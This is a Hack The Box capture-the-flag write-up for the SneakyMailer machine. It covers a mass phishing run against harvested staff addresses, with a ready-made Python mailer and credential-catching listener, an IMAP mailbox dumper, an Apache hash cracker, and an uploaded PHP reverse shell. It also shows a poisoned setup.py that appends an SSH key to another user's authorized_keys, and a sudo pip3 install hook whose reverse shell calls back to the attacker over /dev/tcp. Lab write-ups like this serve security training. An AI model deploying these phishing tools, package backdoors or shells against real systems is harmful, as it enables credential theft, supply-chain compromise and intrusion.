
SneakyMailer HTB Writeup


First, let's start with an Nmap service scan:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nmap -sC -sV -Pn --max-rate=1000 10.10.10.197 
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: UTF8=ACCEPTA0001 ACL2=UNION NAMESPACE UIDPLUS ACL SORT OK ENABLE completed THREAD=REFERENCES IDLE CHILDREN IMAP4rev1 QUOTA CAPABILITY STARTTLS THREAD=ORDEREDSUBJECT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UTF8=ACCEPTA0001 ACL2=UNION NAMESPACE UIDPLUS ACL SORT OK ENABLE completed THREAD=REFERENCES IDLE CHILDREN IMAP4rev1 QUOTA AUTH=PLAIN CAPABILITY THREAD=ORDEREDSUBJECT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

A quick summary of the open ports:

PORT     STATE SERVICE    REASON
21/tcp   open  ftp        syn-ack
22/tcp   open  ssh        syn-ack
25/tcp   open  smtp       syn-ack
80/tcp   open  http       syn-ack
143/tcp  open  imap       syn-ack
993/tcp  open  imaps      syn-ack
8080/tcp open  http-proxy syn-ack
http://10.10.10.197 redirects to http://sneakycorp.htb, as the http-title line in the scan already hinted.

Let's add sneakycorp.htb to our hosts file.

Finding subdomains by fuzzing the Host header with wfuzz:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ wfuzz -c -w /usr/share/wordlists/wfuzz/general/medium.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"  

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://sneakycorp.htb/
Total requests: 1659

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                         
===================================================================
000000446:   200        340 L    989 W    13737 Ch    "dev" 

Let's add dev.sneakycorp.htb to the hosts file too:

10.10.10.197	sneakycorp.htb	dev.sneakycorp.htb

The box name hints at phishing. The team.php page lists every employee, so we harvest their e-mail addresses with cewl and use them as targets:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ cewl -e --email_file emails.txt http://sneakycorp.htb/team.php

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ cat emails.txt
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb

Let's listen on port 80 and send every address a mail that points at our listener:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ sudo nc -nvlp 80                          
listening on [any] 80 ...
┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.xx.xx/" --server 10.10.10.197; done < emails.txt

After a short wait we get a hit: one recipient follows the link and POSTs a login form straight to our listener.

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ sudo nc -nvlp 80                                                   
listening on [any] 80 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.197] 49416
POST / HTTP/1.1
Host: 10.10.14.52
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

URL-decoding the parameters gives:

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

So we have:

mail: paulbyrd@sneakymailer.htb
user: paulbyrd
password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
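The swaks loop and the nc listener above, rewritten as one Python script. This is an added example, not code from the original writeup: it sends the same lure to every harvested address over SMTP and runs an HTTP listener that URL-decodes whatever form body comes back. It assumes the target SMTP server relays mail for its local users (as the swaks run shows), that our address is 10.10.14.52 (the address that appears in the captured request), and that port 80 is free; the captured POST body is embedded as sample input.

```python
import smtplib
import threading
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

SMTP_SERVER = "10.10.10.197"       # target, from the nmap scan
LISTEN_ADDR = ("0.0.0.0", 80)      # our catcher (binding 80 needs root)
LURE_URL = "http://10.10.14.52/"   # attacker address, assumed

# The POST body nc captured in the writeup, embedded here as sample input.
CAPTURED_BODY = (
    "firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb"
    "&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
    "&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
)


def build_lure(rcpt: str, sender: str = "it@sneakymailer.htb") -> EmailMessage:
    """Same lure swaks sent: an internal-looking sender and a link to us."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = rcpt
    msg["Subject"] = "Credentials / Errors"
    msg.set_content(f"goto {LURE_URL}")
    return msg


def send_lures(addresses, server: str = SMTP_SERVER) -> int:
    """Deliver one lure per address in a single SMTP session; returns the count sent."""
    sent = 0
    with smtplib.SMTP(server, 25, timeout=10) as smtp:
        for rcpt in addresses:
            smtp.send_message(build_lure(rcpt))
            sent += 1
    return sent


def parse_credentials(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into a flat dict.
    keep_blank_values=True so empty fields still show up in the dump."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


class Catcher(BaseHTTPRequestHandler):
    """Logs and decodes any POST; a browser victim also gets a form on GET."""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'<form method="post"><input name="email">'
                         b'<input name="password" type="password">'
                         b'<input type="submit"></form>')

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace")
        print(f"[+] POST from {self.client_address[0]}")
        for key, value in parse_credentials(body).items():
            print(f"    {key} = {value}")
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    with open("emails.txt") as fh:
        targets = [line.strip() for line in fh if line.strip()]
    server = HTTPServer(LISTEN_ADDR, Catcher)
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()  # listener is up before the first mail goes out
    print(f"[*] sent {send_lures(targets)} lures, waiting for callbacks")
    worker.join()
```

The listener is started before the mails go out so a fast victim (the bot here answered within seconds) cannot hit a closed port.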

These are mail credentials, so the place to use them is the IMAP service on 143/993 (SMTP on 25 only accepts mail; the mailbox sits behind IMAP). Logging in as paulbyrd and reading his folders turns up two interesting mails:

From: Paul Byrd <paulbyrd@sneakymailer.htb>
Recipient: low@debian
Subject: Module testing
Date: Wed, 27 May 2020 13:28:58 -0400

Hello low


Your current task is to install, test and then erase every python module you 
find in our PyPI service, let me know if you have any inconvenience.


From: Paul Byrd <paulbyrd@sneakymailer.htb>
Recipient: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500 (May 15, 2020 14:03:37)

Hello administrator, I want to change this password for the developer account
 
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
 
Please notify me when you do it
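Reading the mailbox programmatically, as an added example that is not part of the original writeup: imaplib logs in with the phished credentials, walks every folder the LIST command reports, and each message is parsed with the standard email package. It assumes plain IMAP on 143 (set use_tls for 993); the sample message is reconstructed from the "Password reset" mail above, with a To: header added.

```python
import email
import imaplib
import re
from email import policy

IMAP_HOST = "10.10.10.197"
USERNAME = "paulbyrd"
PASSWORD = "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht"

# Reconstructed from the mail shown above (To: header assumed).
SAMPLE_MAIL = b"""From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it
"""

# LIST reply shape: (flags) "delimiter" name   -- the name may or may not be quoted
_LIST_RE = re.compile(rb'\((?P<flags>[^)]*)\) (?:"[^"]*"|NIL) (?P<name>.+)$')


def parse_list_entry(entry: bytes) -> str:
    """Pull the mailbox name out of one LIST response line."""
    m = _LIST_RE.match(entry)
    if not m:
        raise ValueError(f"unexpected LIST entry: {entry!r}")
    return m.group("name").decode().strip('"')


def parse_message(raw: bytes) -> dict:
    """Reduce an RFC 822 message to the headers and plain-text body we care about."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    return {
        "from": str(msg["From"]),
        "to": str(msg["To"]),
        "subject": str(msg["Subject"]),
        "date": str(msg["Date"]),
        "body": body.get_content() if body is not None else "",
    }


def dump_mailbox(host=IMAP_HOST, user=USERNAME, password=PASSWORD, use_tls=False):
    """Return [(folder, parsed_message), ...] for every message the account can read."""
    imap = imaplib.IMAP4_SSL(host, 993) if use_tls else imaplib.IMAP4(host, 143)
    imap.login(user, password)
    found = []
    _, folders = imap.list()
    for entry in folders:
        name = parse_list_entry(entry)
        # readonly so we do not flip \Seen flags and tip off the owner
        typ, _ = imap.select(f'"{name}"', readonly=True)
        if typ != "OK":
            continue
        _, data = imap.search(None, "ALL")
        for num in data[0].split():
            _, parts = imap.fetch(num, "(RFC822)")
            found.append((name, parse_message(parts[0][1])))
    imap.logout()
    return found


if __name__ == "__main__":
    for folder, m in dump_mailbox():
        print(f"== {folder}: {m['subject']} ({m['from']} -> {m['to']}, {m['date']})")
        print(m["body"])
```

Walking every folder matters here: the "Password reset" mail is one Paul sent, so it is in his Sent folder, not the inbox.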

The second mail leaks the developer account's password in cleartext. Let's try it on FTP:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ ftp sneakycorp.htb
Connected to sneakycorp.htb.
220 (vsFTPd 3.0.3)
Name (sneakycorp.htb:RajSec): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Successfully logged in as developer. A directory listing shows we are sitting in a web root, so let's upload a PHP reverse shell (configured to call back to our listener on port 2121):

226 Directory send OK.
ftp> put revshell.php
local: revshell.php remote: revshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (29.1030 MB/s)

The FTP root is the document root of dev.sneakycorp.htb, so requesting http://dev.sneakycorp.htb/revshell.php executes it and we get a callback:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nc -nvlp 2121
Connection from 10.10.10.197.
Connection from 10.10.10.197:58672.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 x86_64 GNU/Linux
 07:45:17 up  7:46,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@sneakymailer:/$ su developer
su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

developer@sneakymailer:/$ id
id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:/$ whoami
whoami
developer

Checking /var/www reveals another vhost:

developer@sneakymailer:/var/www$ ls
ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb

Add pypi.sneakycorp.htb to the hosts file. Browsing to it shows a welcome page for the private package index, nothing more. On the box, though, the vhost directory holds the index's .htpasswd (its HTTP basic-auth credentials), and it is readable by developer:



developer@sneakymailer:/var/www$ cat /var/www/pypi.sneakycorp.htb/.htpasswd
cat /var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Cracking it with hashcat (-m 1600, Apache $apr1$ MD5) gives the password:

soufianeelhaoui
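Apache's $apr1$ scheme (the MD5-crypt variant hashcat calls mode 1600) in pure Python, as an added example that is not part of the original writeup, so the .htpasswd line can be verified or dictionary-attacked offline without hashcat. The hash is the one read from .htpasswd above; the candidate list is constructed for the example.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HTPASSWD_LINE = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"   # from .htpasswd
CANDIDATES = ["password", "pypi", "sneakycorp", "soufianeelhaoui", "developer"]  # constructed


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: six bits at a time, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password: bytes, salt: bytes) -> str:
    """Return '$apr1$<salt>$<hash>' exactly as htpasswd -m would."""
    magic = b"$apr1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in len(password) bytes of the alternate sum, 16 at a time.
    n = len(password)
    while n > 0:
        ctx.update(alt[:min(16, n)])
        n -= 16
    # For each bit of len(password): a NUL byte if the bit is set, else password[0].
    n = len(password)
    while n:
        ctx.update(b"\x00" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    # 1000 rounds of deliberately irregular re-hashing (the stretching step).
    for i in range(1000):
        ctx1 = hashlib.md5(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    # Output bytes are permuted before encoding; this order is part of the scheme.
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                       for a, b, c in triples)
    encoded += _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def verify(stored: str, candidate: str) -> bool:
    """Constant-time comparison of a candidate against a stored $apr1$ hash."""
    _, scheme, salt, _ = stored.split("$")
    if scheme != "apr1":
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_crypt(candidate.encode(), salt.encode()), stored)


def crack(htpasswd_line: str, candidates):
    """Dictionary attack on one 'user:hash' line; returns (user, password) or None."""
    user, stored = htpasswd_line.split(":", 1)
    for word in candidates:
        if verify(stored, word):
            return user, word
    return None


if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, CANDIDATES))
```

Because the salt is taken from the stored hash, verify() also works against a line regenerated with htpasswd -m, which picks a fresh random salt each time.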

With this password we can publish packages to the index, as the index's own page describes. Remember the mail to low: he installs and tests every package that appears there, so whatever our package's setup.py does will run as low. Start in /tmp with a package directory:

cd /tmp
mkdir mypkg

Then create a .pypirc pointing at the local index:

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

Transfer it to the box. Here scp pulls it from the attacking machine; note the errors, which reveal that developer's home directory is /var/www/dev.sneakycorp.htb and that no .ssh directory can be created there:

developer@sneakymailer:/tmp/mypkg$ scp root@10.10.xx.xx:/home/RajSec/htb/sneakymailer/.pypirc .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.xx.xx (10.10.xx.xx)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.xx.xx's password:
.pypirc                                       100%  128     0.4KB/s   00:00
developer@sneakymailer:/tmp/mypkg$ chmod 600 .pypirc
chmod 600 .pypirc
developer@sneakymailer:/tmp/mypkg$ ls -la
ls -la
total 12
drwxrwxrwx  2 developer developer 4096 Jul 12 07:09 .
drwxrwxrwt 10 root      root      4096 Jul 12 07:09 ..
-rw-------  1 developer developer  128 Jul 12 07:09 .pypirc

Generate an SSH key pair on the attacking machine; the public half goes into the package:

ssh-keygen -f key

Create a setup.py that appends your public key to low's authorized_keys. Everything in setup.py runs whenever the package is built or installed, and the mail above tells us low installs every package on the index:

import setuptools

# Payload: this runs whenever setup.py is executed, i.e. on every build or install.
# Replace the placeholder with the contents of key.pub.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nsshkeypublic key")  # your public key
except Exception:
    pass  # swallow errors so the install still "succeeds" and nothing looks odd

setuptools.setup(
    name="example-pkg3",
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

Transfer setup.py to the box with scp or a Python HTTP server. Setuptools looks for .pypirc in $HOME, so point HOME at the package directory (which is why the prompt changes to ~), then build the sdist, register it and upload it in one go:

developer@sneakymailer:/tmp/mypkg$ chmod 777 setup.py
chmod 777 setup.py
developer@sneakymailer:/tmp/mypkg$ HOME=$(pwd)
HOME=$(pwd)
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

As soon as low's job installs the package, our key is in his authorized_keys and we can SSH in with the private half:

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ ssh -i key low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ whoami
low

Successfully logged in

low@sneakymailer:~$ ls
user.txt  venv
low@sneakymailer:~$ wc -c user.txt
33	user.txt

Gaining Root

Let's run sudo -l

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
                                                                                                                                   
User low may run the following commands on sneakymailer:                                                                           
    (root) NOPASSWD: /usr/bin/pip3
    

low can run pip3 as root with no password. pip install executes a package's setup.py as the invoking user, so a setup.py whose install command spawns a shell gives us root. Create this one in /dev/shm/:

from setuptools import setup
from setuptools.command.install import install
import os


class CustomInstall(install):
    """Install hook: pip runs this as the invoking user, here root via sudo."""

    def run(self):
        install.run(self)
        # Reverse shell back to the attacking machine (adjust IP and port).
        os.system("bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/5678 0>&1'")


setup(
    name='RajSecPip',
    version='0.0.1',
    description='This will exploit a sudoer able to /usr/bin/pip install *',
    url='https://github.com/0x00-0x00/rajsecpip',
    author='zc00l',
    author_email='andre.marques@esecurity.com.br',
    license='MIT',
    zip_safe=False,
    cmdclass={'install': CustomInstall},  # replace the stock install command
)

Now install our package with sudo and catch the shell on port 5678:

low@sneakymailer:/dev/shm$ sudo /usr/bin/pip3 install . --upgrade --force-reinstall
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /dev/shm
Building wheels for collected packages: RajSecPip
  Running setup.py bdist_wheel for RajSecPip ... -
  
┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nc -nvlp 5678                                 
Connection from 10.10.10.197.
Connection from 10.10.10.197:41567.
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# whoami
whoami
root
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# cd /root
cd /root
root@sneakymailer:~# ls
ls
root.txt
root@sneakymailer:~# wc -c root.txt
33 	root.txt

Yup! We rooted the box.

Thanks for Reading 🙏
